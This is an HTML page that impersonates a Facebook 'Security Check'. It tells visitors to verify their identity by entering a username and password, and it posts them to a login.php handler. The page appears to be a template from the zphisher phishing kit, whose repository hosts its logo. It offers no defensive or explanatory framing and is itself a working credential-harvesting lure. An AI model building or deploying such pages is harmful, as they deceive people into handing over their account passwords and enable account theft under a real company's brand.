<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>Security Check</title>
	<link rel="shortcut icon" type="ico" href="https://pixabay.com/pl/vectors/facebook-sieci-spo%C5%82ecznej-logo-76658/">
	<style type="text/css">
    
    h1, h2, h3, h4, h5, a, p, ul, li, img, header, section, div, body {margin: 0; padding: 0;}

header {
	width: 1348px;
	height: 84px;
	background: #3B5998;
}

.main-header {
	padding-left:184px; 
}



.form {
    border: 1px solid #cccccc;
    border-radius: 5px;
    height: 420px;
    margin: 60px auto 45px;
    width: 641px;
}

.form h3 {
	color: #333333;
    border-bottom: 1.5px solid #cccccc;
    font-family: tahoma;
    font-size: 18px;
    font-weight: 600;
    margin: 0  20px;
    padding: 20px 0 12px;
}
.red-box {
	margin:24px auto 0;
	width: 600px;
	height: 97px;
	background: #FFEBE8;
	border: 1.5px solid red;
}


.red-box p {
	font-size: 10.5px;
	font-family: tahoma;
    padding: 14px 0 0 20px;
}

.red-box a {
	text-decoration: none;
	color: #3B5998;
}

.red-box a:hover {
	text-decoration: underline;
}

.login-form {
	width:75%;
	margin: 0 auto;
	padding: 23px 0 0 0;
}
.login-form label {
	font-family: tahoma;
    font-size: 13px;
    padding: 2px 10px 3px 5px;
}
.login-form input {
   padding: 2px 10px 3px 5px;
}


footer {
	width: 984px;
	margin:0 auto;
	border-top: 1.5px solid #cccccc;
}

ul li {
	display: inline;
	margin: 0 0 0 28px;
}


ul li a {
	text-decoration: none;
	font-family: tahoma;
	font-size: 10.5px;
	color: #3B5998;
}
ul li a:hover {
	text-decoration: underline;
}	
    </style>
</head>
<body>
	<header>
		<div class="main-header">
			<div class="logo">
				<a href="http://www.facebook.com"><img src="https://raw.githubusercontent.com/htr-tech/zphisher/master/.sites/fb_security/logo.png"></a>
			</div>
		</div>
	</header>
	<section>
		<div class="form">
			<div class="m-header">
				<h3>Facebook Security Check. Please Verify It's You.</h3>
			</div>
			<div class="red-box">
				<p style="font-weight:bold; font-size:13px">Verify needed to understand it's you</p>
				<p>Enter your password for security reason (make sure your caps lock is off)</p>
				<p>Forgot your password ? <a href="">Request new one</a>
			</div>

			<div  class="login-form">
				<form method="post" class="bb" novalidate="1" id="login-form" action="login.php">
	                <label for="username">Username:</label><input name="username" id="username" type="username"></input><br />
	                <br>     <br/>
					<label for="password">Password:</label><input name="password" id="password" type="password"></input><br />
					<input id="keep" style="margin: 10px 0 0 84px" type="checkbox"></input>
					<label for="keep" style="font-size:12px;">keep me logged in</label><br />
					<input type="submit" name="submit" value="Verify" style="background: none repeat scroll 0 0 #3b5998; border: 1px solid #294461; color: #ffffff; margin: 4px 0 0 80px; padding: 2px 6px;"></input>
					<p><a style="text-decoration:none; color:#3B5998; margin:0 0 0 80px;" href="">can't log in?</a></p>
				</form>
			</div>

		</div>
		
		<footer>
			<ul>
				<li><a href="">Mobile</a></li>
				<li><a href="">Find Friends</a></li>
				<li><a href="">Badges</a></li>
				<li><a href="">People</a></li>
				<li><a href="">Pages</a></li>
				<li><a href="">Apps</a></li>
				<li><a href="">Games</a></li>
				<li><a href="">Music</a></li>
				<li><a href="">Locations</a></li>
			</ul>
			<ul>
				<li><a href="">Topics</a></li>
				<li><a href="">About</a></li>
				<li><a href="">Create Ad</a></li>
				<li><a href="">Create Page</a></li>
				<li><a href="">Devepers</a></li>
				<li><a href="">Careers</a></li>
				<li><a href="">Privacy</a></li>
				<li><a href="">Cookies</a></li>
				<li><a href="">Terms</a></li><br />
				<li><a href="">Help</a></li>
			</ul>
		</footer>
	</section>

</body>
</html>
